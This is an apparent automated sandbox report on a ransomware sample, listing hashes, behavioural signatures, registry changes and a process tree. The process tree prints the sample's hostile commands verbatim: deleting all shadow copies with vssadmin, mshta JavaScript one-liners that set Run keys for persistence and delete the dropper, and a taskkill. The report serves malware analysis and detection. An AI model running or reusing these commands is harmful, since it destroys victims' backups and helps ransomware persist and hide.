Analysis
  Max time kernel: 241s
  Max time network: 273s
  Platform: windows7_x64
  Resource: win7v20210408
  Submitted: 14/08/2021, 02:17

  Static task: static1

  Behavioral task: behavioral1
    Sample: 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
    Resource: win7v20210408

  Behavioral task: behavioral2
    Sample: 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
    Resource: win10v20210410
General
  Target: 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
  Size: 256KB
  MD5: 156ed66fb7257ef1bdd6385c71e5aa83
  SHA1: 2d302323eab61e5791ab5ce2c6728e6708743bed
  SHA256: 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560
  SHA512: c63a679abf8eb64ba4a722df4638249499d8ab9e6a94db5e3d39ab136afbe4cec563ff9698814170b12e55d5616865776273303e99a5b7e8742bc870ae5ebdb4
Malware Config
Signatures

Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.

Blocklisted process makes network request (9 IoCs)
  flow | pid  | Process
  7    | 1504 | mshta.exe
  8    | 1504 | mshta.exe
  10   | 1504 | mshta.exe
  11   | 1504 | mshta.exe
  14   | 1504 | mshta.exe
  15   | 1504 | mshta.exe
  17   | 1504 | mshta.exe
  18   | 1504 | mshta.exe
  20   | 1504 | mshta.exe

Executes dropped EXE (1 IoCs)
  pid  | Process
  1528 | trust.exe

Modifies extensions of user files (2 IoCs)
  Ransomware generally changes the extension on encrypted files.
  description                  | ioc                                         | Process
  File opened for modification | C:\Users\Admin\Pictures\ApproveExport.tiff  | trust.exe
  File opened for modification | C:\Users\Admin\Pictures\WatchConvert.tiff   | trust.exe

Deletes itself (1 IoCs)
  pid  | Process
  1420 | mshta.exe

Loads dropped DLL (2 IoCs)
  pid  | Process
  1976 | 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
  1976 | 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe

Adds Run key to start application (2 TTPs, 4 IoCs)
  description     | ioc                                                                                                                                                                                    | Process
  Key created     | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce                                                                       | mshta.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\{EE750B8B-8F1F-4FEB-B415-B9B0FDBD4893} = "C:\\Users\\Admin\\AppData\\Local\\trust.exe" | mshta.exe
  Key created     | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run                                                                           | trust.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\How to restore files = "mshta.exe \"C:\\Users\\Admin\\How to restore files.hta\"" | trust.exe

Drops desktop.ini file(s) (27 IoCs)
  description                  | ioc                                                                        | Process
  File opened for modification | C:\Users\Admin\Links\desktop.ini                                           | trust.exe
  File opened for modification | C:\Users\Admin\Saved Games\desktop.ini                                     | trust.exe
  File opened for modification | C:\Users\Public\Libraries\desktop.ini                                      | trust.exe
  File opened for modification | C:\Users\Public\Pictures\desktop.ini                                       | trust.exe
  File opened for modification | C:\Users\Admin\Desktop\desktop.ini                                         | trust.exe
  File opened for modification | C:\Users\Admin\Contacts\desktop.ini                                        | trust.exe
  File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini                                 | trust.exe
  File opened for modification | C:\Users\Admin\Videos\desktop.ini                                          | trust.exe
  File opened for modification | C:\Users\Public\Documents\desktop.ini                                      | trust.exe
  File opened for modification | C:\Users\Admin\Favorites\desktop.ini                                       | trust.exe
  File opened for modification | C:\Users\Admin\Music\desktop.ini                                           | trust.exe
  File opened for modification | C:\Users\Public\Music\Sample Music\desktop.ini                             | trust.exe
  File opened for modification | C:\Users\Public\Recorded TV\Sample Media\desktop.ini                       | trust.exe
  File opened for modification | C:\Users\Public\Pictures\Sample Pictures\desktop.ini                       | trust.exe
  File opened for modification | C:\Users\Public\Videos\desktop.ini                                         | trust.exe
  File opened for modification | C:\Users\Admin\Downloads\desktop.ini                                       | trust.exe
  File opened for modification | C:\$Recycle.Bin\S-1-5-21-2455352368-1077083310-2879168483-1000\desktop.ini | trust.exe
  File opened for modification | C:\Users\Public\Downloads\desktop.ini                                      | trust.exe
  File opened for modification | C:\Users\Public\Videos\Sample Videos\desktop.ini                           | trust.exe
  File opened for modification | C:\Users\Admin\Documents\desktop.ini                                       | trust.exe
  File opened for modification | C:\Users\Admin\Pictures\desktop.ini                                        | trust.exe
  File opened for modification | C:\Users\Admin\Searches\desktop.ini                                        | trust.exe
  File opened for modification | C:\Users\Public\Recorded TV\desktop.ini                                    | trust.exe
  File opened for modification | C:\Users\Admin\Favorites\Links for United States\desktop.ini               | trust.exe
  File opened for modification | C:\Users\Public\Desktop\desktop.ini                                        | trust.exe
  File opened for modification | C:\Users\Public\desktop.ini                                                | trust.exe
  File opened for modification | C:\Users\Public\Music\desktop.ini                                          | trust.exe

Maps connected drives based on registry (3 TTPs, 4 IoCs)
  Disk information is often read in order to detect sandboxing environments.
  description       | ioc                                                         | Process
  Key opened        | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum   | trust.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | trust.exe
  Key opened        | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum   | 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Interacts with shadow copies (2 TTPs, 1 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  pid  | Process
  1632 | vssadmin.exe

Kills process with taskkill (1 IoCs)
  pid | Process
  888 | taskkill.exe

Modifies Internet Explorer settings (4 IoCs)
  description | ioc                                                                                                        | Process
  Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
  Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
  Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
  Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe

Modifies system certificate store (4 IoCs)
  description      | ioc                                                                                                                                           | Process
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 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 | mshta.exe
  Key created      | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C                                        | mshta.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 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 | mshta.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 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 | mshta.exe

Suspicious behavior: EnumeratesProcesses (8 IoCs)
  pid  | Process
  1976 | 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
  1976 | 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
  1976 | 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
  1976 | 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
  1528 | trust.exe
  1528 | trust.exe
  1528 | trust.exe
  1528 | trust.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description               | pid | Process
  Token: SeBackupPrivilege  | 568 | vssvc.exe
  Token: SeRestorePrivilege | 568 | vssvc.exe
  Token: SeAuditPrivilege   | 568 | vssvc.exe
  Token: SeDebugPrivilege   | 888 | taskkill.exe

Suspicious use of WriteProcessMemory (32 IoCs)
  description                        | pid  | Process                                                              | procid_target
  PID 1976 wrote to memory of 1528   | 1976 | 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe | 29
  PID 1976 wrote to memory of 1528   | 1976 | 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe | 29
  PID 1976 wrote to memory of 1528   | 1976 | 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe | 29
  PID 1976 wrote to memory of 1528   | 1976 | 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe | 29
  PID 1976 wrote to memory of 1420   | 1976 | 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe | 30
  PID 1976 wrote to memory of 1420   | 1976 | 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe | 30
  PID 1976 wrote to memory of 1420   | 1976 | 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe | 30
  PID 1976 wrote to memory of 1420   | 1976 | 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe | 30
  PID 1528 wrote to memory of 1520   | 1528 | trust.exe                                                            | 31
  PID 1528 wrote to memory of 1520   | 1528 | trust.exe                                                            | 31
  PID 1528 wrote to memory of 1520   | 1528 | trust.exe                                                            | 31
  PID 1528 wrote to memory of 1520   | 1528 | trust.exe                                                            | 31
  PID 1528 wrote to memory of 1632   | 1528 | trust.exe                                                            | 32
  PID 1528 wrote to memory of 1632   | 1528 | trust.exe                                                            | 32
  PID 1528 wrote to memory of 1632   | 1528 | trust.exe                                                            | 32
  PID 1528 wrote to memory of 1632   | 1528 | trust.exe                                                            | 32
  PID 1528 wrote to memory of 1504   | 1528 | trust.exe                                                            | 37
  PID 1528 wrote to memory of 1504   | 1528 | trust.exe                                                            | 37
  PID 1528 wrote to memory of 1504   | 1528 | trust.exe                                                            | 37
  PID 1528 wrote to memory of 1504   | 1528 | trust.exe                                                            | 37
  PID 1528 wrote to memory of 1648   | 1528 | trust.exe                                                            | 38
  PID 1528 wrote to memory of 1648   | 1528 | trust.exe                                                            | 38
  PID 1528 wrote to memory of 1648   | 1528 | trust.exe                                                            | 38
  PID 1528 wrote to memory of 1648   | 1528 | trust.exe                                                            | 38
  PID 1648 wrote to memory of 888    | 1648 | cmd.exe                                                              | 40
  PID 1648 wrote to memory of 888    | 1648 | cmd.exe                                                              | 40
  PID 1648 wrote to memory of 888    | 1648 | cmd.exe                                                              | 40
  PID 1648 wrote to memory of 888    | 1648 | cmd.exe                                                              | 40
  PID 1528 wrote to memory of 1392   | 1528 | trust.exe                                                            | 42
  PID 1528 wrote to memory of 1392   | 1528 | trust.exe                                                            | 42
  PID 1528 wrote to memory of 1392   | 1528 | trust.exe                                                            | 42
  PID 1528 wrote to memory of 1392   | 1528 | trust.exe                                                            | 42
Processes
(indentation shows parent/child depth in the process tree)

C:\Users\Admin\AppData\Local\Temp\028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe"
  PID: 1976
  - Loads dropped DLL
  - Maps connected drives based on registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\trust.exe
      Command line: "C:\Users\Admin\AppData\Local\trust.exe" runas
      PID: 1528
      - Executes dropped EXE
      - Modifies extensions of user files
      - Adds Run key to start application
      - Drops desktop.ini file(s)
      - Maps connected drives based on registry
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\mshta.exe
          Command line: mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');setInterval(function(){try{o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{EE750B8B-8F1F-4FEB-B415-B9B0FDBD4893}','C:\\Users\\Admin\\AppData\\Local\\trust.exe');}catch(e){}},10);"
          PID: 1520
          - Adds Run key to start application
          - Modifies Internet Explorer settings

        C:\Windows\SysWOW64\vssadmin.exe
          Command line: vssadmin.exe Delete Shadows /All /Quiet
          PID: 1632
          - Interacts with shadow copies

        C:\Windows\SysWOW64\mshta.exe
          Command line: mshta.exe "C:\Users\Admin\How to restore files.hta"
          PID: 1504
          - Blocklisted process makes network request
          - Modifies Internet Explorer settings
          - Modifies system certificate store

        C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\system32\cmd.exe" /C taskkill /PID 1520 /F
          PID: 1648
          - Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\taskkill.exe
              Command line: taskkill /PID 1520 /F
              PID: 888
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken

        C:\Windows\SysWOW64\mshta.exe
          Command line: mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('C:\\Users\\Admin\\AppData\\Local\\trust.exe');close()}catch(e){}},10);"
          PID: 1392
          - Modifies Internet Explorer settings

    C:\Windows\SysWOW64\mshta.exe
      Command line: mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('C:\\Users\\Admin\\AppData\\Local\\Temp\\028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe');close()}catch(e){}},10);"
      PID: 1420
      - Deletes itself
      - Modifies Internet Explorer settings

C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 568
  - Suspicious use of AdjustPrivilegeToken